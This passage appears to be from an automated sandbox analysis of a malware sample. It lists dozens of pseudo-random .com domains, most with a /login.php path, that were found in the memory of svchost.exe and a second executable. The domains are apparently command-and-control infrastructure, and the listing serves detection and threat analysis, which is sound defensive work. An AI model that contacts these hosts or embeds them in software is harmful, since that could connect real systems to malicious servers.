Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1802479518.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyf.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyt.com/H
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjif.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykyc.com/http://gadyniw.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volykyc.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymum.com/http://lyvylyn.com/http://gadyveb.com/H
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1733345122.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymum.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/P
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567835804.000000000CC6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840908556.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620757969.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840416294.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620677895.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618514695.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620758729.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621135281.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621261518.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617312754.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656025861.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1891490063.000000000CC6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1897340941.0000000003258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/http://gaqykab.com/http://gaqykab.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/http://purylev.com/http://gacynuz.com/http://purylev.com/H
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600430482.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600576251.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600797663.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryc.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624452735.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624452735.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybym.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694931359.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydum.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykum.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykum.com/login.phpu
